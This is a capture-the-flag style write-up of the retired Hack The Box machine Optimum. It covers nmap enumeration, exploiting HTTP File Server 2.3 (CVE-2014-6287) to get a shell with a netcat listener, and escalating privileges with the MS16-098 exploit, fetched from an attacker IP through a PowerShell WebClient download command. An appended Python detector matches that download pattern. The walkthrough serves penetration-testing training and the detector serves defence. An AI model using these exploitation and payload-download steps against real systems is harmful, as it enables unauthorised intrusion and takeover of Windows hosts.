Hack The Box Optimum Writeup
Hack The Box (HTB) is an online training platform for building penetration testing skills. Optimum is a retired Windows-based box with the IP address 10.10.10.8.
Release: 18 March 2017
Start with Nmap
Run Nmap default scripts (-sC) and enumerate versions (-sV).
#nmap -sC -sV 10.10.10.8 | tee nmap-initial.txt
Scan all ports to check for other open ones
#nmap -p- 10.10.10.8 | tee nmap-all-ports.txt
Run a UDP scan
#nmap -sU 10.10.10.8
As port 80 is open, open the IP in a web browser.
Searching Google for an exploit for HTTP File Server 2.3 turns up CVE-2014-6287.
Read the instructions for executing the payload.
Locate nc.exe on Kali and copy it into the current directory.
Edit the payload with your local IP and port, then save it. Use ifconfig to identify the IP address of your machine.
ip_addr = "10.10.14.16"
local_port = "1111"
Execute the exploit
#nc -lvnp 1111
#python -m SimpleHTTPServer 80
#python exploit.py 10.10.10.8 80
Got a shell. Check the user token.
Use systeminfo to gather information about the OS.
Copy this output to a text file (I have copied it to config-info.txt). Identify vulnerabilities by checking the installed patches using the GitHub repository code. Run privilege escalation exploit code by using the command below:
Many exploits are available for privilege escalation. I have used "Microsoft Windows 8.1 (x64) - 'RGNOBJ' Integer Overflow (MS16-098)". You can download 41020.exe by using the GitHub repository.
Transfer the exe file to the machine and execute it by using the command below to get system.
powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.9/41020.exe','C:\Users\kostas\Desktop\41020.exe')"
Check with the command "whoami". If the output is as below, you have system.
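From the defender's side, the file transfer above leaves a distinctive process command line. The following is an added example, not part of the original write-up: a small detector for the WebClient DownloadFile pattern, run over process-creation command lines. The function names `analyze` and `scan` and the reason labels are illustrative assumptions, and the second and third sample lines are constructed.

```python
import re
from urllib.parse import urlparse

# Matches (New-Object [System.]Net.WebClient).DownloadFile('<url>','<path>')
# case-insensitively, tolerating extra whitespace and either quote style.
CRADLE = re.compile(
    r"new-object\s+(?:system\.)?net\.webclient\s*\)\s*\.\s*downloadfile\s*\(\s*"
    r"['\"](?P<url>[^'\"]+)['\"]\s*,\s*['\"](?P<dest>[^'\"]+)['\"]",
    re.IGNORECASE,
)
EXEC_EXT = (".exe", ".dll", ".ps1", ".bat", ".scr")
IPV4 = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")

def analyze(cmdline):
    """Return a finding dict for a download-to-disk command line, else None."""
    if "powershell" not in cmdline.lower():
        return None
    m = CRADLE.search(cmdline)
    if not m:
        return None
    url, dest = m.group("url"), m.group("dest")
    host = urlparse(url).hostname or ""
    reasons = ["webclient-downloadfile"]
    if dest.lower().endswith(EXEC_EXT):
        reasons.append("executable-written-to-disk")
    if IPV4.match(host):
        reasons.append("raw-ip-host")
    if url.lower().startswith("http://"):
        reasons.append("cleartext-http")
    return {"url": url, "host": host, "dest": dest, "reasons": reasons}

# Sample command lines: the first is the command from this write-up,
# the other two are constructed for illustration.
SAMPLES = [
    r"""powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.9/41020.exe','C:\Users\kostas\Desktop\41020.exe')" """,
    r"""PowerShell.exe -NoP -C "( new-object Net.WebClient ).downloadfile( 'https://updates.example.com/notes.txt' , 'C:\Temp\notes.txt' )" """,
    r"""powershell -c "Get-ChildItem C:\Users" """,
]

def scan(lines):
    """Return findings for every command line that matches the pattern."""
    return [f for f in map(analyze, lines) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLES):
        print(finding)
```

The matcher only sees plain-text command lines; encoded or otherwise obfuscated invocations need script-block logging or decoding before a rule like this applies.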
This article is a quick write-up on the HTB Optimum Windows box. If you have issues with any step, let me know in the comment section.
Disclaimer: This tutorial is for educational purposes only. The individual is solely responsible for any illegal act.